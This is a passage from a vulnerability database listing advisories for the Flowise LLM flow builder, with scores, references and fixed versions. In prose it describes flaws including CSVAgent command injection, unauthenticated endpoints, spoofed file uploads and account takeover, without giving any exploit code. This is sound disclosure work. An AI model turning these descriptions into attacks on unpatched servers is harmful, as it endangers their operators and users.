summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, The CSVAgent allows providing a custom Pandas CSV read code. Due to lack of sanitization, an attacker can provide a command injection payload that will get interpolated and executed by the server. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41137
reference_id
reference_type
scores
0
value 0.00422
scoring_system epss
scoring_elements 0.62631
published_at 2026-06-13T12:55:00Z
1
value 0.00422
scoring_system epss
scoring_elements 0.62626
published_at 2026-06-14T12:55:00Z
2
value 0.00422
scoring_system epss
scoring_elements 0.62518
published_at 2026-06-11T12:55:00Z
3
value 0.00422
scoring_system epss
scoring_elements 0.62619
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41137
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41137
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41137
2
reference_url https://github.com/advisories/GHSA-9wc7-mj3f-74xv
reference_id GHSA-9wc7-mj3f-74xv
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-9wc7-mj3f-74xv
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv
reference_id GHSA-9wc7-mj3f-74xv
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T20:20:09Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41137, GHSA-9wc7-mj3f-74xv
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-j5hh-haj2-qydg
35
url VCID-jcze-eg2c-mkcf
vulnerability_id VCID-jcze-eg2c-mkcf
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints. This issue has been patched in version 3.0.13.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30824
reference_id
reference_type
scores
0
value 0.21588
scoring_system epss
scoring_elements 0.95867
published_at 2026-06-14T12:55:00Z
1
value 0.21588
scoring_system epss
scoring_elements 0.95864
published_at 2026-06-13T12:55:00Z
2
value 0.21588
scoring_system epss
scoring_elements 0.9585
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30824
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30824
reference_id CVE-2026-30824
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30824
2
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13
reference_id flowise%403.0.13
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-09T20:33:44Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13
3
reference_url https://github.com/advisories/GHSA-5f53-522j-j454
reference_id GHSA-5f53-522j-j454
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5f53-522j-j454
4
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454
reference_id GHSA-5f53-522j-j454
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-09T20:33:44Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454
fixed_packages
0
url pkg:npm/flowise@3.0.13
purl pkg:npm/flowise@3.0.13
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-3chx-dj2u-kbab
6
vulnerability VCID-3gp6-wwtd-kkf1
7
vulnerability VCID-5j9e-bcr5-n7bs
8
vulnerability VCID-5pup-kgaf-3ubw
9
vulnerability VCID-67mz-pfy4-ykep
10
vulnerability VCID-71uq-yx2j-cqak
11
vulnerability VCID-9rqv-p7rz-5kar
12
vulnerability VCID-a1e4-f5dh-w3a5
13
vulnerability VCID-aqg8-6us7-uqef
14
vulnerability VCID-b97u-efzx-dffn
15
vulnerability VCID-bkmk-k9mn-ekhx
16
vulnerability VCID-cb6d-4c2v-w7c3
17
vulnerability VCID-cxja-9yxc-k7au
18
vulnerability VCID-d4wa-szeh-43ab
19
vulnerability VCID-dzed-27rk-3qav
20
vulnerability VCID-e65e-s5sd-kuhp
21
vulnerability VCID-ejdc-j73x-jydk
22
vulnerability VCID-fu6t-9dk4-jbh9
23
vulnerability VCID-gt6n-beak-33gy
24
vulnerability VCID-gvpx-4wkw-43cz
25
vulnerability VCID-hdej-umwh-kqav
26
vulnerability VCID-hkfs-v3bp-kbh5
27
vulnerability VCID-j5hh-haj2-qydg
28
vulnerability VCID-kpyg-gve3-b3av
29
vulnerability VCID-pzza-9xq9-a7de
30
vulnerability VCID-qm89-q2ar-uyhy
31
vulnerability VCID-r74e-k86f-7qgb
32
vulnerability VCID-rgmv-6bqh-eqf2
33
vulnerability VCID-s3jg-wce1-fbf3
34
vulnerability VCID-tdm1-91mc-8kgr
35
vulnerability VCID-v1nz-wwsu-qycg
36
vulnerability VCID-v9hg-7pex-g3dp
37
vulnerability VCID-w9yr-5jbp-q7fm
38
vulnerability VCID-xt1d-efw7-g3c6
39
vulnerability VCID-z1y2-f2ws-8ycb
40
vulnerability VCID-zwna-stj5-3yhm
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13
aliases CVE-2026-30824, GHSA-5f53-522j-j454
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jcze-eg2c-mkcf
36
url VCID-jmps-anck-eqdt
vulnerability_id VCID-jmps-anck-eqdt
summary Flowise is vulnerable to arbitrary file exposure through its ReadFileTool
references
0
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-61913
reference_id CVE-2025-61913
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-61913
1
reference_url https://github.com/advisories/GHSA-j44m-5v8f-gc9c
reference_id GHSA-j44m-5v8f-gc9c
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j44m-5v8f-gc9c
2
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c
reference_id GHSA-j44m-5v8f-gc9c
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj
reference_id GHSA-jv9m-vf54-chjj
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj
fixed_packages
0
url pkg:npm/flowise@3.0.8
purl pkg:npm/flowise@3.0.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-3chx-dj2u-kbab
6
vulnerability VCID-3gp6-wwtd-kkf1
7
vulnerability VCID-488c-vrqu-f7hf
8
vulnerability VCID-5j9e-bcr5-n7bs
9
vulnerability VCID-5pup-kgaf-3ubw
10
vulnerability VCID-67mz-pfy4-ykep
11
vulnerability VCID-6ufs-d346-d7ev
12
vulnerability VCID-71uq-yx2j-cqak
13
vulnerability VCID-9bht-svq8-87b4
14
vulnerability VCID-9rqv-p7rz-5kar
15
vulnerability VCID-a1e4-f5dh-w3a5
16
vulnerability VCID-affy-v76q-fub6
17
vulnerability VCID-aqg8-6us7-uqef
18
vulnerability VCID-b97u-efzx-dffn
19
vulnerability VCID-bkmk-k9mn-ekhx
20
vulnerability VCID-cb6d-4c2v-w7c3
21
vulnerability VCID-cxja-9yxc-k7au
22
vulnerability VCID-d4wa-szeh-43ab
23
vulnerability VCID-dtss-epth-z7fh
24
vulnerability VCID-dzed-27rk-3qav
25
vulnerability VCID-e65e-s5sd-kuhp
26
vulnerability VCID-ejdc-j73x-jydk
27
vulnerability VCID-fu6t-9dk4-jbh9
28
vulnerability VCID-gt6n-beak-33gy
29
vulnerability VCID-gvpx-4wkw-43cz
30
vulnerability VCID-hdej-umwh-kqav
31
vulnerability VCID-hkfs-v3bp-kbh5
32
vulnerability VCID-j5hh-haj2-qydg
33
vulnerability VCID-jcze-eg2c-mkcf
34
vulnerability VCID-k579-xd81-hqdu
35
vulnerability VCID-kpyg-gve3-b3av
36
vulnerability VCID-ksmv-s6c9-t7ap
37
vulnerability VCID-m3j3-4u39-euht
38
vulnerability VCID-pzza-9xq9-a7de
39
vulnerability VCID-qm89-q2ar-uyhy
40
vulnerability VCID-r74e-k86f-7qgb
41
vulnerability VCID-rgmv-6bqh-eqf2
42
vulnerability VCID-s3jg-wce1-fbf3
43
vulnerability VCID-tdm1-91mc-8kgr
44
vulnerability VCID-v1nz-wwsu-qycg
45
vulnerability VCID-v9hg-7pex-g3dp
46
vulnerability VCID-w9yr-5jbp-q7fm
47
vulnerability VCID-xt1d-efw7-g3c6
48
vulnerability VCID-ywgu-76cy-uqe7
49
vulnerability VCID-z1y2-f2ws-8ycb
50
vulnerability VCID-zwna-stj5-3yhm
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.8
aliases GHSA-j44m-5v8f-gc9c
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jmps-anck-eqdt
37
url VCID-k579-xd81-hqdu
vulnerability_id VCID-k579-xd81-hqdu
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the /api/v1/attachments/:chatflowId/:chatId endpoint is listed in WHITELIST_URLS, allowing unauthenticated access to the file upload API. While the server validates uploads based on the MIME types defined in chatbotConfig.fullFileUpload.allowedUploadFileTypes, it implicitly trusts the client-provided Content-Type header (file.mimetype) without verifying the file's actual content (magic bytes) or extension (file.originalname). Consequently, an attacker can bypass this restriction by spoofing the Content-Type as a permitted type (e.g., application/pdf) while uploading malicious scripts or arbitrary files. Once uploaded via addArrayFilesToStorage, these files persist in backend storage (S3, GCS, or local disk). This vulnerability serves as a critical entry point that, when chained with other features like static hosting or file retrieval, can lead to Stored XSS, malicious file hosting, or Remote Code Execution (RCE). This issue has been patched in version 3.0.13.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30821
reference_id
reference_type
scores
0
value 0.00271
scoring_system epss
scoring_elements 0.50947
published_at 2026-06-14T12:55:00Z
1
value 0.00271
scoring_system epss
scoring_elements 0.50944
published_at 2026-06-12T12:55:00Z
2
value 0.00271
scoring_system epss
scoring_elements 0.5096
published_at 2026-06-13T12:55:00Z
3
value 0.00271
scoring_system epss
scoring_elements 0.50812
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30821
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30821
reference_id CVE-2026-30821
reference_type
scores
0
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30821
2
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13
reference_id flowise%403.0.13
reference_type
scores
0
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-09T20:34:55Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13
3
reference_url https://github.com/advisories/GHSA-j8g8-j7fc-43v6
reference_id GHSA-j8g8-j7fc-43v6
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j8g8-j7fc-43v6
4
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j8g8-j7fc-43v6
reference_id GHSA-j8g8-j7fc-43v6
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-09T20:34:55Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j8g8-j7fc-43v6
fixed_packages
0
url pkg:npm/flowise@3.0.13
purl pkg:npm/flowise@3.0.13
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-3chx-dj2u-kbab
6
vulnerability VCID-3gp6-wwtd-kkf1
7
vulnerability VCID-5j9e-bcr5-n7bs
8
vulnerability VCID-5pup-kgaf-3ubw
9
vulnerability VCID-67mz-pfy4-ykep
10
vulnerability VCID-71uq-yx2j-cqak
11
vulnerability VCID-9rqv-p7rz-5kar
12
vulnerability VCID-a1e4-f5dh-w3a5
13
vulnerability VCID-aqg8-6us7-uqef
14
vulnerability VCID-b97u-efzx-dffn
15
vulnerability VCID-bkmk-k9mn-ekhx
16
vulnerability VCID-cb6d-4c2v-w7c3
17
vulnerability VCID-cxja-9yxc-k7au
18
vulnerability VCID-d4wa-szeh-43ab
19
vulnerability VCID-dzed-27rk-3qav
20
vulnerability VCID-e65e-s5sd-kuhp
21
vulnerability VCID-ejdc-j73x-jydk
22
vulnerability VCID-fu6t-9dk4-jbh9
23
vulnerability VCID-gt6n-beak-33gy
24
vulnerability VCID-gvpx-4wkw-43cz
25
vulnerability VCID-hdej-umwh-kqav
26
vulnerability VCID-hkfs-v3bp-kbh5
27
vulnerability VCID-j5hh-haj2-qydg
28
vulnerability VCID-kpyg-gve3-b3av
29
vulnerability VCID-pzza-9xq9-a7de
30
vulnerability VCID-qm89-q2ar-uyhy
31
vulnerability VCID-r74e-k86f-7qgb
32
vulnerability VCID-rgmv-6bqh-eqf2
33
vulnerability VCID-s3jg-wce1-fbf3
34
vulnerability VCID-tdm1-91mc-8kgr
35
vulnerability VCID-v1nz-wwsu-qycg
36
vulnerability VCID-v9hg-7pex-g3dp
37
vulnerability VCID-w9yr-5jbp-q7fm
38
vulnerability VCID-xt1d-efw7-g3c6
39
vulnerability VCID-z1y2-f2ws-8ycb
40
vulnerability VCID-zwna-stj5-3yhm
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13
aliases CVE-2026-30821, GHSA-j8g8-j7fc-43v6
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k579-xd81-hqdu
38
url VCID-kpyg-gve3-b3av
vulnerability_id VCID-kpyg-gve3-b3av
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, assistant create and update mass-assignment allows cross-workspace assistant takeover. This issue has been patched in version 3.1.2.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-46475
reference_id
reference_type
scores
0
value 0.00053
scoring_system epss
scoring_elements 0.17095
published_at 2026-06-12T12:55:00Z
1
value 0.00053
scoring_system epss
scoring_elements 0.16939
published_at 2026-06-11T12:55:00Z
2
value 0.00128
scoring_system epss
scoring_elements 0.31915
published_at 2026-06-13T12:55:00Z
3
value 0.00143
scoring_system epss
scoring_elements 0.34561
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-46475
1
reference_url https://github.com/FlowiseAI/Flowise/commit/1cf247eab35c7c3d4db381d23e4dca682fba527b
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/commit/1cf247eab35c7c3d4db381d23e4dca682fba527b
2
reference_url https://github.com/FlowiseAI/Flowise/pull/6128
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/pull/6128
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-46475
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-46475
4
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
reference_id flowise%403.1.2
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-08T16:19:29Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
5
reference_url https://github.com/advisories/GHSA-78pr-c5x5-jggc
reference_id GHSA-78pr-c5x5-jggc
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-78pr-c5x5-jggc
6
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-78pr-c5x5-jggc
reference_id GHSA-78pr-c5x5-jggc
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-08T16:19:29Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-78pr-c5x5-jggc
fixed_packages
0
url pkg:npm/flowise@3.1.2
purl pkg:npm/flowise@3.1.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.2
aliases CVE-2026-46475, GHSA-78pr-c5x5-jggc
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kpyg-gve3-b3av
39
url VCID-ksmv-s6c9-t7ap
vulnerability_id VCID-ksmv-s6c9-t7ap
summary Flowise Vulnerable to PII Disclosure on Unauthenticated Forgot Password Endpoint
references
0
reference_url https://github.com/advisories/GHSA-jc5m-wrp2-qq38
reference_id GHSA-jc5m-wrp2-qq38
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jc5m-wrp2-qq38
1
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jc5m-wrp2-qq38
reference_id GHSA-jc5m-wrp2-qq38
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jc5m-wrp2-qq38
fixed_packages
0
url pkg:npm/flowise@3.0.13
purl pkg:npm/flowise@3.0.13
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-3chx-dj2u-kbab
6
vulnerability VCID-3gp6-wwtd-kkf1
7
vulnerability VCID-5j9e-bcr5-n7bs
8
vulnerability VCID-5pup-kgaf-3ubw
9
vulnerability VCID-67mz-pfy4-ykep
10
vulnerability VCID-71uq-yx2j-cqak
11
vulnerability VCID-9rqv-p7rz-5kar
12
vulnerability VCID-a1e4-f5dh-w3a5
13
vulnerability VCID-aqg8-6us7-uqef
14
vulnerability VCID-b97u-efzx-dffn
15
vulnerability VCID-bkmk-k9mn-ekhx
16
vulnerability VCID-cb6d-4c2v-w7c3
17
vulnerability VCID-cxja-9yxc-k7au
18
vulnerability VCID-d4wa-szeh-43ab
19
vulnerability VCID-dzed-27rk-3qav
20
vulnerability VCID-e65e-s5sd-kuhp
21
vulnerability VCID-ejdc-j73x-jydk
22
vulnerability VCID-fu6t-9dk4-jbh9
23
vulnerability VCID-gt6n-beak-33gy
24
vulnerability VCID-gvpx-4wkw-43cz
25
vulnerability VCID-hdej-umwh-kqav
26
vulnerability VCID-hkfs-v3bp-kbh5
27
vulnerability VCID-j5hh-haj2-qydg
28
vulnerability VCID-kpyg-gve3-b3av
29
vulnerability VCID-pzza-9xq9-a7de
30
vulnerability VCID-qm89-q2ar-uyhy
31
vulnerability VCID-r74e-k86f-7qgb
32
vulnerability VCID-rgmv-6bqh-eqf2
33
vulnerability VCID-s3jg-wce1-fbf3
34
vulnerability VCID-tdm1-91mc-8kgr
35
vulnerability VCID-v1nz-wwsu-qycg
36
vulnerability VCID-v9hg-7pex-g3dp
37
vulnerability VCID-w9yr-5jbp-q7fm
38
vulnerability VCID-xt1d-efw7-g3c6
39
vulnerability VCID-z1y2-f2ws-8ycb
40
vulnerability VCID-zwna-stj5-3yhm
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13
aliases GHSA-jc5m-wrp2-qq38
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ksmv-s6c9-t7ap
40
url VCID-m3j3-4u39-euht
vulnerability_id VCID-m3j3-4u39-euht
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, there is an IDOR vulnerability, leading to account takeover and enterprise feature bypass via SSO configuration. This issue has been patched in version 3.0.13.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30823
reference_id
reference_type
scores
0
value 0.00033
scoring_system epss
scoring_elements 0.10033
published_at 2026-06-14T12:55:00Z
1
value 0.00033
scoring_system epss
scoring_elements 0.10042
published_at 2026-06-12T12:55:00Z
2
value 0.00033
scoring_system epss
scoring_elements 0.09992
published_at 2026-06-11T12:55:00Z
3
value 0.00033
scoring_system epss
scoring_elements 0.10047
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30823
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30823
reference_id CVE-2026-30823
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30823
2
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13
reference_id flowise%403.0.13
reference_type
scores
0
value 8.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:34:04Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13
3
reference_url https://github.com/advisories/GHSA-cwc3-p92j-g7qm
reference_id GHSA-cwc3-p92j-g7qm
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-cwc3-p92j-g7qm
4
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm
reference_id GHSA-cwc3-p92j-g7qm
reference_type
scores
0
value 8.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:34:04Z/
